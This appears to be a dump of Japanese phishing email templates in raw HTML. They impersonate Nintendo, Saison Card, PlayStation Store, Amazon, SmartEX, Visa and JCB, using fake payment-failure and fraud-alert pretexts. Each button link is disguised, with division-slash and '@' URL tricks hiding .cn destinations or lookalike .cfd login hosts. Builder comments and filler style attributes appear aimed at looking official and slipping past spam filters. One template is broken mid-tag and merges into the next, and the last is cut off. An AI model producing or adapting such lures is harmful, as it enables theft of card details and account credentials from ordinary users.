__【サブスクリプション更新】停止を希望される場合は
<!-- UltraClean Nintendo v2 | DOM完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f3f3f3;
font-family: "Meiryo", "Hiragino Kaku Gothic ProN", sans-serif;
color: #333;
font-size: 15px;
line-height: 1.7;
}
.box {
max-width: 700px;
margin: auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 2px 10px rgba(0,0,0,0.04);
overflow: hidden;
}
.header {
background: #cc0000;
color: #fff;
padding: 22px 26px;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 26px 28px;
}
.section p {
margin: 12px 0;
}
.error-box {
background: #fff3f3;
border-left: 5px solid #cc0000;
padding: 16px;
margin: 20px 0;
border-radius: 5px;
}
.error-list {
padding-left: 20px;
margin: 16px 0;
}
.error-list li {
margin-bottom: 8px;
}
.action-wrap {
display: flex;
justify-content: center;
margin: 32px 0;
}
.action-wrap a {
display: inline-block;
text-align: center;
padding: 12px 30px;
border: 2px solid #cc0000;
color: #cc0000;
border-radius: 30px;
font-weight: bold;
font-size: 15px;
text-decoration: none;
transition: 0.3s;
}
.action-wrap a:hover {
background: #cc0000;
color: #fff;
}
.footer {
background: #f9f9f9;
padding: 20px 26px;
font-size: 13px;
color: #777;
border-top: 1px solid #ccc;
}
.footer ul {
margin: 8px 0 0;
padding-left: 20px;
}
.footer a {
color: #cc0000;
text-decoration: none;
}
.footer a:hover {
text-decoration: underline;
}
@media screen and (max-width: 600px) {
.section {
padding: 18px;
}
.action-wrap a {
width: 100%;
box-sizing: border-box;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=box>
<DIV class=header>Nintendo Switch Online</DIV>
<DIV class=section>
<DIV class=error-box>【重要】決済エラーに関するご案内</DIV>
<P style="border-top-color:transparent;">平素よりNintendo Switch Onlineをご利用いただき、誠にありがとうございます。</P>
<P style="hyphens:manual;">以下の理由により、<STRONG>2025年01月22日(JST)</STRONG>の決済が完了できませんでした:</P>
<UL class=error-list>
<LI>クレジットカードの有効期限切れ
<LI>PayPalの利用制限
<LI>eショップ残高の不足 </LI></UL>
<P>引き続きサービスをご利用いただくには、下記より再度利用券をご購入ください。</P>
<DIV class=action-wrap><A
href="https://kwvxwmhe.com∕XUMZpORyJ∕EjiATO∕RUUecEiyS∕wJhyEuV∕DxfcfScLrq@aYHvnQK.ckhkwwb.cn"
target=_blank>利用券を再度購入する</A> </DIV>
<P style="column-rule:medium none black;">本手続きは3〜5分で完了し、安全に処理されます。</P></DIV>
<DIV class=footer>
<P>このメールには返信できません。</P>
<P style="background-position:0% 0%;">お問い合わせは下記サポートサイトをご利用ください:</P>
<UL>
<LI><A
href="https://nxeih.com∕IUqDBwvv∕BRaOmIqrL∕PcbqnSdSv∕oUITRnXmT∕FKxnkzpF@preCbVAGE.ckhkwwb.cn"
target=_blank>Nintendo Switch Online サポート</A>
<LI><A
href="https://eqjjwiae.com∕LxEaG∕HjhXZLdx∕jeFOg∕CxefxkrGY∕Gsjhga@QMDqiIODo.ckhkwwb.cn"
target=_blank>任天堂カスタマーセンター</A> </LI></UL>
<P>任天堂株式会社 | 京都府京都市南区上鳥羽鉾立町11-1</P></DIV></DIV></BODY></HTML>
__【確認必須】セゾンカードご利用に関して
<HTML lang=ja><HEAD><TITLE>【セゾンカード】本人確認のお願い</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f1f3f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-box { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); }
.header-strip { background:#00315f; color:#fff; font-size:16px; font-weight:bold; text-align:center; padding:20px 24px; }
.main-content { padding:26px 30px; }
.main-content p { margin-bottom:16px; }
.cta-zone { padding:24px 0; text-align:center; }
.cta-btn { display:inline-block; background:#003262; color:#fff; text-decoration:none; font-weight:bold; font-size:14px; padding:14px 36px; border-radius:999px; box-shadow:0 3px 6px rgba(0,0,0,0.1); }
.cta-btn:hover { background:#00284d; }
.warning-box { background:#f2f8ff; padding:16px 18px; font-size:14px; margin:26px 0; border-left:5px solid #004b91; border-radius:4px; color:#004b91; }
.info-block { background:#f9f9fa; border-top:1px solid #ddd; padding:24px 28px; font-size:13px; color:#444; }
.info-block strong { color:#000; display:block; margin-bottom:6px; }
.footer-line { text-align:center; background:#f2f3f4; padding:18px; font-size:12px; color:#777; border-top:1px solid #ccc; }
.footer-line a { color:#004b91; text-decoration:none; }
@media screen and (max-width: 600px) {
.main-content, .info-block { padding:18px 16px; font-size:14px; }
.cta-btn { width:100%; box-sizing:border-box; padding:16px 0; }
}
</STYLE>
</HEAD>
<BODY>
<DIV class=outer-box>
<DIV class=header-strip>【セゾンカード】本人確認のお願い</DIV>
<DIV class=main-content>
<P style="font-style:normal;">平素よりセゾンカードをご利用いただき誠にありがとうございます。</P>
<P>現在、セキュリティ強化の一環としてご本人様確認をお願いしております。</P>
<P style="border-left-width:0px;">下記より認証ページへアクセスの上、必要な情報をご入力ください。</P></DIV>
<DIV class=cta-zone><A class=cta-btn
href="https://rnhtnw.com∕qevewl@gewqvns.cn/Ch878R1/payment/kFZiDM1LT7Jvq/6oR6L/product/RjNuLZUS/orders/NdaRh8C/notifications/OYvypg9/payment/b6UKMNK6/user?utm_source=newsletter&category=HXdgR&cart_id=ijl-7CyGvm&clickid=smNyo_h9aTXY&page=fgKm">
【重要】PlayStation StoreでEMV 3-Dセキュア本人認証が導入されます
<!-- UltraClean PSStore v1 | 完全異構HTML構造 + 新ボタン + 応答性 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #e8ecf2;
font-family: "Meiryo", sans-serif;
font-size: 15px;
line-height: 1.7;
color: #1d1d1d;
}
.outer {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.06);
overflow: hidden;
}
.top {
background: #25284f;
color: #fff;
padding: 24px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.content {
padding: 28px 30px;
}
.content h2 {
font-size: 16px;
color: #25284f;
border-left: 4px solid #7890ff;
padding-left: 10px;
margin: 0 0 16px;
}
.alert-box {
background: #eef2fd;
border: 1px solid #90b4f7;
padding: 16px;
margin: 20px 0;
border-radius: 4px;
font-size: 14px;
}
.cta-center {
margin: 30px 0;
text-align: center;
}
.cta-link {
background: #ffffff;
border: 2px solid #4a6cf7;
color: #4a6cf7;
padding: 12px 30px;
font-weight: bold;
border-radius: 999px;
text-decoration: none;
font-size: 15px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-link:hover {
background: #f0f4ff;
}
.footer {
font-size: 12px;
color: #777;
background: #f5f5f5;
text-align: center;
padding: 18px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px 16px;
}
.cta-link {
display: block;
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=outer>
<DIV class=top>PlayStation Store 本人認証に関するご案内</DIV>
<DIV class=content>
<H2>セキュリティ強化のご案内</H2>
<P>平素よりPlayStation Storeをご利用いただき誠にありがとうございます。</P>
<P>このたび、クレジットカード取引のさらなる安全性を確保するため、本人認証サービス(EMV 3-Dセキュア)を導入いたします。</P>
<DIV
class=alert-box>お支払い時にはワンタイムパスワードの入力が必要となる場合がございます。<BR>ご利用には、各カード会社のWebサイトやアプリでの事前登録が必要です。
</DIV>
<P style="writing-mode:horizontal-tb;">未登録の場合、お支払いが正常に完了しない可能性があります。詳細は以下のリンクをご確認ください。</P>
<DIV class=cta-center><A class=cta-link
href="https://cfjowyfg.com∕eBLTcIpoy∕RxZewdp∕gCMSp∕MLCuKcsL∕taiwxSYN@yDcLxV.iwrumo.cn"
target=_blank>詳細を見る</A> </DIV>
<P style="page-break-after:auto;">本人認証サービスをご利用いただくことで、より安心してお買い物いただけます。</P></DIV>
<DIV class=footer>本メールは送信専用です。返信には対応しておりません。<BR>© 2025 Sony Interactive
Entertainment Inc. All Rights Reserved. </DIV></DIV></BODY></HTML>
【重要】Kindle Unlimited 定期購入の更新について
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML data-lang="ja"><HEAD><TITLE>Kindle Unlimited 更新のお知らせ</TITLE>
<META charset=utf-8>
<META name=GENERATOR content="MSHTML 11.00.10570.1001"></HEAD>
<BODY
style="FONT-FAMILY: 'Hiragino Sans', Meiryo, Arial, sans-serif; BACKGROUND: #f0f2f4; PADDING-BOTTOM: 16px; PADDING-TOP: 16px; PADDING-LEFT: 16px; MARGIN: 0px; PADDING-RIGHT: 16px">
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD align=center>
<TABLE style="MAX-WIDTH: 700px" cellSpacing=0 cellPadding=0 width=700
border=0><!-- Header -->
<TBODY>
<TR>
<TD>
<TABLE style="BACKGROUND: #232f3e; BORDER-COLLAPSE: collapse"
cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD
style="BORDER-BOTTOM: #1a2433 2px solid; PADDING-BOTTOM: 36px; TEXT-ALIGN: center; PADDING-TOP: 36px; PADDING-LEFT: 24px; PADDING-RIGHT: 24px">
<H1
style="FONT-SIZE: 20px; FONT-WEIGHT: bold; COLOR: #ffffff; MARGIN: 0px 0px 8px">Kindle
Unlimited 定期購入の更新について </H1>
<P
style="FONT-SIZE: 14px; COLOR: #c7c7c7; MARGIN: 0px">無料体験期間がまもなく終了いたします
</P></TD></TR></TBODY></TABLE></TD></TR><!-- Content -->
<TR>
<TD>
<TABLE style="BACKGROUND: #ffffff" cellSpacing=0 cellPadding=0
width="100%" border=0>
<TBODY>
<TR>
<TD
style="PADDING-BOTTOM: 32px; PADDING-TOP: 32px; PADDING-LEFT: 28px; PADDING-RIGHT: 28px"><STRONG
style="MARGIN-BOTTOM: 16px; DISPLAY: block">Kindle Unlimited
無料体験のご案内 </STRONG><!-- Notice Box -->
<TABLE
style="BORDER-TOP: #e5d9f9 1px solid; BORDER-RIGHT: #e5d9f9 1px solid; BACKGROUND: #f9f5ff; BORDER-BOTTOM: #e5d9f9 1px solid; BORDER-LEFT: #e5d9f9 1px solid; MARGIN: 20px 0px; border-radius: 4px"
cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD
style="PADDING-BOTTOM: 20px; PADDING-TOP: 20px; PADDING-LEFT: 18px; PADDING-RIGHT: 18px">お客様のKindle
Unlimited無料体験は<STRONG>2026年1月25日</STRONG>に終了いたします。<BR>継続をご希望の場合、同日に月額プランへの自動更新が行われます。
</TD></TR></TBODY></TABLE><!-- Price -->
<DIV
style="FONT-SIZE: 16px; BORDER-BOTTOM: #d5dbdb 1px dashed; FONT-WEIGHT: bold; COLOR: #565959; PADDING-BOTTOM: 8px; PADDING-TOP: 8px; PADDING-LEFT: 0px; MARGIN: 20px 0px; PADDING-RIGHT: 0px">更新後の月額料金:
980円 (税込) </DIV><!-- Guide -->
<TABLE
style="BORDER-TOP: #d5dbdb 1px solid; BORDER-RIGHT: #d5dbdb 1px solid; BACKGROUND: #f7f9fa; BORDER-BOTTOM: #d5dbdb 1px solid; BORDER-LEFT: #d5dbdb 1px solid; MARGIN: 30px 0px; border-radius: 4px"
cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD
style="PADDING-BOTTOM: 22px; PADDING-TOP: 22px; PADDING-LEFT: 22px; PADDING-RIGHT: 22px">
<DIV
style="MARGIN-BOTTOM: 15px; FONT-WEIGHT: bold">定期購入の管理方法:
</DIV><ckatni ucaao="wyuywhdx"></ckatni>
<OL style="PADDING-LEFT: 18px; MARGIN: 0px">
<LI
style="MARGIN-BOTTOM: 12px">Amazonアカウントにログイン後、「アカウントサービス」を開きます
<LI style="MARGIN-BOTTOM: 12px">「メンバーシップと定期購入」を選択します
<LI>「Kindle Unlimited」を選択し、設定を確認または変更します
</LI></OL></TD></TR></TBODY></TABLE><!-- Button -->
<TABLE style="MARGIN: 36px 0px" cellSpacing=0 cellPadding=0
width="100%" border=0>
<TBODY>
<TR>
<TD align=center><A
style="FONT-SIZE: 15px; TEXT-DECORATION: none; BORDER-TOP: #f0c14b 1px solid; BORDER-RIGHT: #f0c14b 1px solid; BACKGROUND: #ffd814; BORDER-BOTTOM: #f0c14b 1px solid; FONT-WEIGHT: bold; COLOR: #0f1111; PADDING-BOTTOM: 14px; PADDING-TOP: 14px; PADDING-LEFT: 40px; BORDER-LEFT: #f0c14b 1px solid; DISPLAY: inline-block; PADDING-RIGHT: 40px; border-radius: 8px"
href="https://www.arivox.cfd/aridarivoxonMoparivoxt18992"
target=_blank>定期購入を管理する </A></TD></TR></TBODY></TABLE>
<HR
style="BORDER-TOP-STYLE: none; BORDER-LEFT-STYLE: none; HEIGHT: 1px; BACKGROUND: #e7e7e7; BORDER-BOTTOM-STYLE: none; BORDER-RIGHT-STYLE: none; MARGIN: 35px 0px 25px">
<!-- Notes -->
<DIV
style="FONT-SIZE: 13px; COLOR: #565959; LINE-HEIGHT: 1.6">
<P
style="MARGIN: 0px 0px 10px">自動更新を希望されない場合は、上記の手順に従って2026年1月25日までにキャンセルしてください。
</P>
<P style="MARGIN: 0px 0px 10px">Kindle
Unlimitedでは、和書・洋書100万冊以上、コミック・マンガ、雑誌が読み放題です。更新後もお楽しみいただけます。
</P>
<P
style="MARGIN: 0px">ご不明な点がございましたら、Amazonカスタマーサービスまでお問い合わせください。
</P></DIV><lvumo mjjq="uzcjysmm"></lvumo></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<TABLE style="BORDER-TOP: #1a2433 2px solid; BACKGROUND: #232f3e"
cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD
style="FONT-SIZE: 12px; COLOR: #c7c7c7; PADDING-BOTTOM: 24px; TEXT-ALIGN: center; PADDING-TOP: 24px; PADDING-LEFT: 20px; PADDING-RIGHT: 20px">©
2026 Amazon.com, Inc. or its affiliates. All rights
reserved.<BR>プライバシーポリシーセキュリティ情報
</TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></BODY></HTML>
__【Amazon】プライム機能の再認証が必要となります
<HTML lang=ja><HEAD><TITLE>Amazonプライム支払い確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f3f4f7; font-family:"Meiryo",sans-serif; color:#2a2a2a; font-size:15px; line-height:1.8; }
.outer-shell { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.05); border:1px solid #ddd; }
.headbar { background:#232f3e; color:#fff; text-align:center; padding:22px; font-size:16px; font-weight:bold; }
.maincontent { padding:28px 30px; }
.maincontent p { margin-bottom:16px; }
.warnblock { background:#fff0e1; border-left:6px solid #d9822b; padding:14px 20px; font-size:14px; font-weight:bold; border-radius:4px; margin:24px 0; color:#8b4513; }
.cta { text-align:center; margin:30px 0; }
..cta a { display:inline-block; background:#ff8c00; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:5px; transition:all .3s ease; }
.cta a:hover { background:#d26900; }
.infolist { padding:0 0 0 20px; margin:0 0 24px; font-size:14px; color:#333; }
.infolist li { margin-bottom:8px; }
.footerinfo { background:#f5f6f7; padding:20px 26px; font-size:13px; color:#666; border-top:1px solid #ccc; text-align:center; }
.footerinfo a { color:#007bff; text-decoration:none; }
@media screen and (max-width: 600px) {
.maincontent { padding:18px 16px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY>
<DIV class=outer-shell>
<DIV class=headbar>Amazonプライム会員資格の更新について</DIV>
<DIV class=maincontent>
<P style="clip:auto;">いつもAmazonプライムをご利用いただき、誠にありがとうございます。</P>
<P>現在、ご登録の支払い方法により月額料金の請求が正常に処理できておりません。</P>
<P style="page-break-after:auto;"><STRONG>お支払い情報を確認の上、3日以内に再設定をお願いいたします。</STRONG></P>
<DIV class=warnblock>ご対応がない場合、プライム特典の一時停止やアカウント機能の制限が行われる可能性があります。 </DIV>
<P><STRONG>請求保留の主な理由:</STRONG></P>
<UL class=infolist>
<LI>クレジットカードの有効期限切れ
<LI>口座残高不足または引き落とし不能
<LI>カード会社による承認拒否
<LI>登録情報の更新漏れ </LI></UL>
<P style="hyphens:manual;">プライム特典を継続してご利用いただくために、早めのご対応をお願いいたします。</P></DIV>
<DIV class=cta><A
href="https://svryldwu.com∕jaaebyu∕pteknhvor∕ntwiughyk∕rlwctfhh∕ofvfrwxz@adwjthq.cn">お支払い方法を確認する</A>
</DIV>
<DIV class=footerinfo>このメールは送信専用です。返信はできません。<BR>詳細は <A href="#">カスタマーサービス</A>
までお問い合わせください。<BR><BR>© 2025 Amazon Japan G.K. All rights reserved.
</DIV></DIV></BODY></HTML>
__【ご注意事項】不正利用防止のため速やかな対応をお願いしますNW=0263843725
<!-- UltraClean SmartEX v1 | 完全新DOM構造 + Official感 + Button変化 --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background-color: #e5eaf0;
color: #2b2b2b;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 680px;
margin: 40px auto;
background: #ffffff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.header {
background-color: #004e9a;
color: #ffffff;
padding: 22px 26px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.body {
padding: 26px 28px;
}
.body p {
margin: 14px 0;
}
.ticket-box {
background: #f2f7fb;
border: 1px solid #b3d7f0;
padding: 18px;
border-radius: 6px;
font-size: 14px;
margin: 24px 0;
}
.cta-wrap {
text-align: center;
margin: 32px 0;
}
.cta-wrap a {
background: #004e9a;
color: #fff;
font-weight: bold;
padding: 14px 34px;
text-decoration: none;
border-radius: 30px;
display: inline-block;
transition: background 0.3s ease;
font-size: 15px;
}
.cta-wrap a:hover {
background: #003366;
}
.footer {
font-size: 12px;
color: #666;
background: #f1f1f1;
padding: 20px 26px;
line-height: 1.6;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.body {
padding: 20px 16px;
}
.cta-wrap a {
width: 92%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=frame>
<DIV class=header>【重要】スマートEX ご予約内容のご確認</DIV>
<DIV class=body>
<P style="clip:auto;">平素よりスマートEXをご利用いただき、誠にありがとうございます。</P>
<P style="text-transform:none;">以下のご予約において、セキュリティ監視システムにより不正利用の可能性が検出されました。</P>
<DIV class=ticket-box><STRONG>■
ご予約内容</STRONG><BR>お預かり番号:29642848<BR>乗車日:2026-01-22<BR>区間:東京 →
新大阪<BR>乗車人数:おとな6名<BR>座席:スマートEX自由席<BR>発売額:81,811円 </DIV>
<P style="perspective-origin:50% 50%;">このご予約は、<STRONG style="COLOR: #c00">一時的に停止</STRONG>されております。</P>
<P style="border-left-style:none;">ご本人様によるお手続きが確認できない場合、自動的にキャンセルとなる可能性がございます。</P>
<P>お心当たりがない場合は、以下のリンクより会員情報の確認をお願いいたします。</P>
<DIV class=cta-wrap><A
href="https://usciobqvmf.com∕BhuXdhIx∕GNWoBAg∕bPNBy@kkfzqik.cn/cglmhoqc.co.jp"
target=_blank>確認手続きはこちら</A> </DIV>
<P style="border-left-style:none;">お忙しい中恐縮ですが、何卒よろしくお願い申し上げます。</P></DIV>
<DIV
class=footer>※本メールは送信専用です。返信いただいても対応できません。<BR>※24時間以内にご確認いただけない場合、ご予約はキャンセルされる可能性があります。<BR>©
2025 SmartEX Inc. All rights reserved. </DIV></DIV></BODY></HTML>
__【自動更新に関するご案内】停止手続きが必要です
<!-- UltraClean Nintendo v2 | DOM完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #f3f3f3;
font-family: "Meiryo", "Hiragino Kaku Gothic ProN", sans-serif;
color: #333;
font-size: 15px;
line-height: 1.7;
}
.box {
max-width: 700px;
margin: auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 2px 10px rgba(0,0,0,0.04);
overflow: hidden;
}
.header {
background: #cc0000;
color: #fff;
padding: 22px 26px;
font-size: 18px;
font-weight: bold;
}
.section {
padding: 26px 28px;
}
.section p {
margin: 12px 0;
}
.error-box {
background: #fff3f3;
border-left: 5px solid #cc0000;
padding: 16px;
margin: 20px 0;
border-radius: 5px;
}
.error-list {
padding-left: 20px;
margin: 16px 0;
}
.error-list li {
margin-bottom: 8px;
}
.action-wrap {
display: flex;
justify-content: center;
margin: 32px 0;
}
.action-wrap a {
display: inline-block;
text-align: center;
padding: 12px 30px;
border: 2px solid #cc0000;
color: #cc0000;
border-radius: 30px;
font-weight: bold;
font-size: 15px;
text-decoration: none;
transition: 0.3s;
}
.action-wrap a:hover {
background: #cc0000;
color: #fff;
}
.footer {
background: #f9f9f9;
padding: 20px 26px;
font-size: 13px;
color: #777;
border-top: 1px solid #ccc;
}
.footer ul {
margin: 8px 0 0;
padding-left: 20px;
}
.footer a {
color: #cc0000;
text-decoration: none;
}
.footer a:hover {
text-decoration: underline;
}
@media screen and (max-width: 600px) {
.section {
padding: 18px;
}
.action-wrap a {
width: 100%;
box-sizing: border-box;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=box>
<DIV class=header>Nintendo Switch Online</DIV>
<DIV class=section>
<DIV class=error-box>【重要】決済エラーに関するご案内</DIV>
<P>平素よりNintendo Switch Onlineをご利用いただき、誠にありがとうございます。</P>
<P style="margin-top:0;">以下の理由により、<STRONG>2025年01月22日(JST)</STRONG>の決済が完了できませんでした:</P>
<UL class=error-list>
<LI>クレジットカードの有効期限切れ
<LI>PayPalの利用制限
<LI>eショップ残高の不足 </LI></UL>
<P>引き続きサービスをご利用いただくには、下記より再度利用券をご購入ください。</P>
<DIV class=action-wrap><A
href="https://tsran.com∕TvZGLKyKD∕KwLARsesfZ∕BPOWUc∕EkXEjVQL∕xEQSfW@TaqvskqU.ckhkwwb.cn"
target=_blank>利用券を再度購入する</A> </DIV>
<P style="object-position:50% 50%;">本手続きは3〜5分で完了し、安全に処理されます。</P></DIV>
<DIV class=footer>
<P style="counter-increment:none;">このメールには返信できません。</P>
<P>お問い合わせは下記サポートサイトをご利用ください:</P>
<UL>
<LI><A
href="https://nhbru.com∕PBrGlJQ∕QftYfmQJ∕hGOog∕FmUVEG∕uTdhut@fZONiba.ckhkwwb.cn"
target=_blank>Nintendo Switch Online サポート</A>
<LI><A
href="https://bnfxwcaoer.com∕ENOzLldK∕iIsLu∕NmbBLA∕YSwkbiRagf∕cHhheV@qiWZL.ckhkwwb.cn"
target=_blank>任天堂カスタマーセンター</A> </LI></UL>
<P style="line-height:normal;">任天堂株式会社 | 京都府京都市南区上鳥羽鉾立町11-1</P></DIV></DIV></BODY></HTML>
お知らせ:visacardのご利用に関する認証が必要です。
<HTML lang=ja><HEAD><TITLE>Visaセキュリティ通知</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#eef1f6; font-family:"Meiryo",sans-serif; color:#222; font-size:15px; line-height:1.8; }
.container { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.06); }
.header { background:#003087; color:#fff; text-align:center; padding:20px 24px; font-size:16px; font-weight:bold; }
.content { padding:28px 30px; }
.content p { margin-bottom:16px; }
.alert { background:#fff7d8; border-left:6px solid #ffb300; padding:16px 20px; font-size:14px; margin:24px 0; border-radius:4px; }
.cta { text-align:center; margin:30px 0; }
.cta a { display:inline-block; background:#003087; color:#fff; padding:14px 36px; font-size:15px; font-weight:bold; text-decoration:none; border-radius:32px; transition:all .3s ease; }
.cta a:hover { background:#001e4f; }
.info { font-size:13px; color:#555; background:#f5f6f8; padding:20px 26px; border-top:1px solid #ccc; }
.footer { text-align:center; font-size:12px; color:#777; background:#f2f2f2; padding:18px; border-top:1px solid #ccc; }
@media screen and (max-width:600px) {
.content { padding:18px 14px; }
.cta a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY>
<DIV class=container>
<DIV class=header>Visaセキュリティセンター - ご利用確認のお願い</DIV>
<DIV class=content>
<P>平素よりVisaカードをご利用いただき誠にありがとうございます。</P>
<P>当社セキュリティシステムにて、通常と異なるアクセスが検出されました。</P>
<P>お客様の安全を守るため、下記リンクよりご本人様確認をお願いいたします。</P>
<DIV
class=alert>ご本人確認が完了次第、通常通りカードをご利用いただけます。<BR>72時間以内に確認が完了しない場合、一時的なご利用制限が発生する可能性がございます。
</DIV></DIV>
<DIV class=cta><A
href="https://visaenxoqr.com∕pogrvofymt∕klpbukdedd∕jmcnq∕mbfetfpwav∕oxihcls∕qcsnllnum∕tohyfl@nnoxpz.cn">ご本人確認を行う</A>
</DIV>
<DIV
class=info>本メールはセキュリティ確認のために自動配信されています。<BR>ご利用に心当たりがない場合は、Visaカスタマーセンターまで速やかにご連絡ください。
</DIV>
<DIV class=footer>※このメールは送信専用です。返信には対応しておりません。<BR>© 2025 Visa Inc. All rights
reserved. </DIV></DIV></BODY></HTML>
JCBカード利用制限解除の最終手続きをお願いします【331b-hp】
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>【重要】カード制限解除の最終確認</title>
</head>
<body style="margin:0;padding:0;background-color:#e6f0fa;font-family:Arial,Meiryo,sans-serif;">
<table width="100%" cellpadding="0" cellspacing="0" role="presentation" style="background-color:#e6f0fa;">
<tr>
<td align="center" style="padding:16px 0;">
<table width="600" cellpadding="0" cellspacing="0" role="presentation" style="width:100%;max-width:600px;background-color:#ffffff;border-radius:8px;">
<tr>
<td align="center" style="background-color:#005bac;padding:24px 16px;">
<span style="color:#ffffff;font-size:18px;font-weight:bold;">
【重要】カード制限解除の最終確認のお願い
</span>
</td>
</tr>
<tr>
<td style="padding:32px 24px;color:#000000;font-size:16px;line-height:1.6;">
<table width="100%" cellpadding="0" cellspacing="0" role="presentation">
<tr>
<td align="center" style="padding-bottom:24px;">
<img src="https://www.jcb.co.jp/common_new/images/header/header-logo.png"
alt="JCB"
width="140"
style="display:block;border:0;">
</td>
</tr>
</table>
<p style="margin:0 0 24px;">JCBカードご利用者様</p>
<table width="100%" cellpadding="0" cellspacing="0" role="presentation" style="background-color:#f8f9fc;border-left:4px solid #005bac;margin-bottom:24px;">
<tr>
<td style="padding:16px;">
<strong style="color:#d14343;">お手続きが未完了</strong>のため、カード機能は現在制限された状態です。<br>
制限解除には下記手続きの完了が必要です。
</td>
</tr>
</table>
<table width="100%" cellpadding="0" cellspacing="0" role="presentation" style="background-color:#f8f9fc;margin-bottom:24px;">
<tr>
<td style="padding:16px;">
<p style="margin:0 0 12px;font-weight:bold;color:#005bac;">
【対象カード】カード番号「354」で始まるJCBカード
</p>
<p style="margin:0;font-weight:bold;color:#d14343;">
⚠ 有効期限: 2026年01月31日 23:59
</p>
</td>
</tr>
</table>
<!-- 按钮 -->
<table width="100%" cellpadding="0" cellspacing="0" role="presentation" style="margin:32px 0;">
<tr>
<td align="center">
<a href="https://jcp.backonline.cfd/v6/aooin/jcplogin?cid=5282141514101" target="_blank"
style="display:inline-block;padding:16px 32px;
background-color:#005bac;color:#ffffff;
font-size:18px;font-weight:bold;
text-decoration:none;border-radius:6px;">
手続きを再開する
</a>
</td>
</tr>
</table>
<p style="margin:0 0 24px;font-size:15px;">
※ セキュリティ確認のため、手続き終了後に電話による本人確認が必要な場合があります。
</p>
<!-- 安全提醒 -->
<table width="100%" cellpadding="0" cellspacing="0" role="presentation"
style="background-color:#fffaf6;border:1px solid #e0e0e0;margin-bottom:24px;">
<tr>
<td style="padding:16px;">
<p style="margin:0 0 12px;font-weight:bold;color:#d14343;">
<ご注意ください>
</p>
<ul style="margin:0;padding-left:20px;font-size:14px;line-height:1.6;">
<li>本メールは手続き未完了の方のみに送信しています</li>
<li>JCBはメールで個人情報の入力を求めることはありません</li>
<li>URLは必ず https://www.jcb.co.jp/ で始まることをご確認ください</li>
<li>不審なリンクや添付ファイルにはアクセスしないでください</li>
</ul>
</td>
</tr>
</table>
<p style="margin:0;font-size:15px;">
ご不明な点はカスタマーサポートまで:<br>
<strong style="color:#005bac;">0120-123-456(24時間対応)</strong>
</p>
</td>
</tr>
<!-- 底部 -->
<tr>
<td align="center" style="background-color:#f5f7fa;padding:24px 16px;font-size:13px;color:#5f6d7e;line-height:1.6;">
<p style="margin:0 0 8px;">本メールは自動送信専用です。返信はできません。</p>
<p style="margin:0 0 8px;">
